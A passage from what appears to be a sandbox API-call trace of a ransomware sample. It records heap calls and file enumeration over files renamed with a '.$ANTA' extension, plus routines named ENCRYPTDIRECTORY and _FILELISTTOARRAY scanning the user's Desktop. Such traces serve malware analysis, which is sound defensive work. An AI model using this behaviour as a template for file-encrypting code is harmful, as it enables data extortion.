Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0118.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0118.201] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x127e1219, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x127e1219, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1282d652, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xba00, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="lJ_RJDQgish84bCgxK.wav.$ANTA", cAlternateFileName="LJ_RJD~1.$AN")) returned 1 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0118.202] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.202] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0118.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca358 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0118.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.203] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.203] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.203] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1289feb3, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1289feb3, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1291237d, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xee30, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="vgfSxUhhzUZpNrrLJ3hR.mp3.$ANTA", cAlternateFileName="VGFSXU~1.$AN")) returned 1 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.203] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9bf0 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0118.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.203] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0118.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.204] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.204] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.204] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e26a0, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e26a0, ftLastWriteTime.dwLowDateTime=0x43e8f00, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="ﴸмńဓ+\x10")) returned 0 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0118.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0118.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0118.205] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0118.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8cd8 [0118.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0118.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca400 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.205] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.205] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0118.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0118.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0118.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0118.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.206] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.209] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0118.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0118.211] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0118.211] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x144f1d8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0118.213] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0118.213] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0118.213] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe0946398, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xe0946398, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9d70, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0118.213] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe0946398, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xe0946398, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9d70, cFileName="..", cAlternateFileName="")) returned 1 [0118.213] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cea130, ftCreationTime.dwHighDateTime=0x1d5e5cb, ftLastAccessTime.dwLowDateTime=0x4328c100, ftLastAccessTime.dwHighDateTime=0x1d5ef89, ftLastWriteTime.dwLowDateTime=0x4328c100, ftLastWriteTime.dwHighDateTime=0x1d5ef89, nFileSizeHigh=0x0, nFileSizeLow=0x249c, dwReserved0=0x0, dwReserved1=0x43c9d70, cFileName="0ocQBHc.xls", cAlternateFileName="")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a8072b0, ftCreationTime.dwHighDateTime=0x1d5e2a8, ftLastAccessTime.dwLowDateTime=0xe074f000, ftLastAccessTime.dwHighDateTime=0x1d5ec4b, ftLastWriteTime.dwLowDateTime=0xe074f000, ftLastWriteTime.dwHighDateTime=0x1d5ec4b, nFileSizeHigh=0x0, nFileSizeLow=0x158aa, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="1YTxNPPGwWg.wav", cAlternateFileName="1YTXNP~1.WAV")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31429790, ftCreationTime.dwHighDateTime=0x1d5ee80, ftLastAccessTime.dwLowDateTime=0x354fc030, ftLastAccessTime.dwHighDateTime=0x1d5e942, ftLastWriteTime.dwLowDateTime=0x354fc030, ftLastWriteTime.dwHighDateTime=0x1d5e942, nFileSizeHigh=0x0, nFileSizeLow=0x775e, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="2V N4wBRBU.mp3", cAlternateFileName="2VN4WB~1.MP3")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca667c00, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xca667c00, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0x2e3c7500, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x11ec00, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="42F0.TMP.EXE.exe", cAlternateFileName="42F0TM~1.EXE")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348b92b0, ftCreationTime.dwHighDateTime=0x1d5ef1d, ftLastAccessTime.dwLowDateTime=0x2fccd30, ftLastAccessTime.dwHighDateTime=0x1d5ef28, ftLastWriteTime.dwLowDateTime=0x2fccd30, ftLastWriteTime.dwHighDateTime=0x1d5ef28, nFileSizeHigh=0x0, nFileSizeLow=0x22f8, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="5NSsZwi6b.rtf", cAlternateFileName="5NSSZW~1.RTF")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc36e39c0, ftCreationTime.dwHighDateTime=0x1d5ec74, ftLastAccessTime.dwLowDateTime=0x7de735d0, ftLastAccessTime.dwHighDateTime=0x1d5e9d8, ftLastWriteTime.dwLowDateTime=0x7de735d0, ftLastWriteTime.dwHighDateTime=0x1d5e9d8, nFileSizeHigh=0x0, nFileSizeLow=0x50c5, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="9IrmcPpBnuYGc4Yelr9W.mp4", cAlternateFileName="9IRMCP~1.MP4")) returned 